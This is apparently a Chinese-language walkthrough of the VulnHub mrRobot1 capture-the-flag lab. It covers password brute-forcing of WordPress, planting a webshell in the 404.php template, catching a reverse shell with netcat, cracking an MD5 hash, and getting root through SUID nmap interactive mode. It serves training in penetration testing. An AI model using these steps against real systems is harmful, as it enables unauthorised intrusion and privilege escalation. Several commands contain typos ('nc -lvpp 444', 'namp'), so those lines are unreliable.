Bootstrap

VulnHub — mrRobot1

信息收集

nmap 192.168.164.0/24

 22端口被关闭了 访问80网站,很像一个终端的页面

访问robots.txt拿到第一个flag

 还有一个dic文件,访问下载下来是个字典文件

扫描目录 发现有wordpress后台页面 

sort 排序 -u 去重 

 sort -u fsocity.dic > dic.txt

将其保存为新的字典 ,去登录页面尝试用户名和密码的爆破

用户名密码爆破 

直接用burp来爆破 

先爆用户名 得到是elliot

爆出密码ER28-0652 

 

成功登录后台 

WordPress后台反弹shell

1.wordpress后台登录地址
http://192.168.164.138/wordpress/wp-admin

2.修改404页面,写入webshell (自行设置监听IP和端口)
appearance----editer----404.php

3.在攻击机上面开启监听4444端口 
nc -lvpp 444

4.访问404页面,反向连接到主机 (404地址固定)
http://192.168.164.138/wordpress/wp-content/themes/twentyfifteen/404.php

5.交互式连接
python -c 'import pty;pty.spawn("/bin/bash")'

进入后台 找到编辑404页面 

将webshell脚本写进去  保存  

nc -lvvp 4444  然访问404.php

连接成功  

交互式连接 

python -c 'import pty;pty.spawn("/bin/bash")'

 

进入home目录 就有个robot用户

进入 发现有flag 但是没有权限查看 

还有一个password MD5加密的 可以读取到  

 这个md5直接拿去解密

 那么就得到了用户名robot,密码abcdefghijklmnopqrstuvwxyz 

登录robot用户后拿到第二个flag 

 SUID提权(nmap)

Set User ID是一种权限类型,允许用户使用指定用户的权限执行文件。那些具有suid权限的文件以最高的权限运行。假设我们以非root用户身份访问目标系统,井且我们发现二进制文件启用了suid位,那么这些文件/程序/命令可以root权限运行. SUID的目的就是:让本来没有相应权限的用户运行这个程序时,可以访问他没有权限访问的资源。

1、查看具有SUID的二进制可执行文件 
find / -user root -perm -4000 -print 2>/dev/null

2、一直可用来提权的linux可行性的文件列表如下:
Nmap 、 Vim 、 find 、 Bash 、 More 、 Less 、Nano 、 cp

3、进入namp可交互模式(仅限2.02到5.21版本)
namp --interactive

4、提权root
!sh

查看具有SUID的二进制可执行文件  

 看到nmap 

进入namp可交互模式(仅限2.02到5.21版本)
namp --interactive

提权root
!sh

 成功拿到root权限

;